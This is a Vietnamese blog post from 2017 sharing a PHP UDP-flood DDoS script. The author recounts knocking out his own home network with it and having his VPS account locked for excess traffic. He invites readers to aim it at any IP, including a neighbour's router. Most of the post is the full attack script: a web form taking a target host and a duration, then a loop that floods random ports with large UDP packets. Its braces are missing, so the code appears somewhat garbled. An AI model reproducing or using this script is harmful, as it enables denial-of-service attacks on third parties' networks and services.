Friday, March 24, 2017

Share Code DDOS PHP độ mạnh trung bình

Lý do 2 ngày nay Web không vào được cũng do cái Code khốn nạn này, mình Up thử lên VPS để DDOS vào chính Router nhà mình thì trong vào 3 giây, sập mẹ cái mạng ở nhà, tiếp theo đó là Bên cung cấp VPS gửi Email Lock Account vì thấy lượng traffic ra khá lớn, có khả năng gây ảnh hưởng đến hệ thống bên họ


Đây là Email thông báo của bên VPS:



Lưu lượng gửi đi vượt quá 6876,54 Mb/s

Do đó có thể nói Code này dồn tổng lực Traffic của VPS để request hết vào Victim

Đây là Code DDOS UDP, nên các bác cứ nhầm vào IP mà táng nhé, ai có Host thì chơi Host, ai có VPS thì chơi VPS  :roll: .

Còn nếu muốn chơi một mất một còn, DDOS vào Router nhà thằng hàng xóm, thì dụ lấy được cái IP WAN nhà nó rồi. Rồi cài Xampp trên máy tính của bạn để thực thi file PHP. Nếu bạn nào chưa biết sử dụng Xampp thì comment ở dưới, mình sẽ làm 1 bài chi tiết về nó

Các bạn Save Code dưới dây thành file ddos.php rồi up lên Host tùy ý, do Code này mang tính chất nguy hiểm nên có một số Hosting sẽ tự động xóa không cho Up lên
<?php 
$ip = $_SERVER['REMOTE_ADDR'];
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<title>DDOS PHP By AnonyViet</title>
<center>
<body background="https://up.ssc.vn/images/329logoddoslam.png">
<font color="FF3636">
<font size= "6">
<font size="5">
<pre>

</pre>
<b>Your IP:</b> <font color="blue"><?php echo $ip; ?></font>&nbsp;(Độ mạnh trung
bình)<br><br><font color="blue">
</font>
<STYLE>
input
background-color: white; font-size: 10pt; color: black; font-family: Tahoma; border: 1 solid #66;

button
background-color:# FF0303; font-size: 8pt; color: black; font-family: Tahoma; border: 1 solid #66;

body


</style>
<?php
//UDP
if(isset($_GET['host'])&&isset($_GET['time']))
$packets = 0;
ignore_user_abort(TRUE);
set_time_limit(0);

$exec_time = $_GET['time'];

$time = time();
//print "Started: ".time('d-m-y h:i:s')."<br>";
$max_time = $time+$exec_time;

$host = $_GET['host'];

for($i=0;$i<65000;$i++)
$out .= 'X';

while(1)
$packets++;
if(time() > $max_time)
break;

$rand = rand(1,65000);
$fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
if($fp)
fwrite($fp, $out);
fclose($fp);


echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
echo '<br><br>
<form action="'.$surl.'" method=GET>
<input type="hidden" name="act" value="phptools">
IP cần tấn công: <br><input type=text name=host><br>
Thời gian (giây): <br><input type=text name=time><br>
<input type=submit value=Go></form>';
else echo '<br><b>UDP Flood</b><br>
<form action=? method=GET>
<input type="hidden" name="act" value="phptools">
Host: <br><input type=text name=host value=><br>
Length (seconds): <br><input type=text name=time value=><br><br>
<input type=submit value=Go></form>';

?>
<marquee behavior="scroll" direction="right"><font color="limegreen"><center><strong>We are AnonyViet</strong></font></marquee>
<marquee behavior="scroll" direction="left"><font color="blue"><center><strong>We are not Hacker, Only Hack to Learn, No Learn to Hack</strong></font></marquee</center>
</head>
</body>
</html>

 

 

No comments:

Post a Comment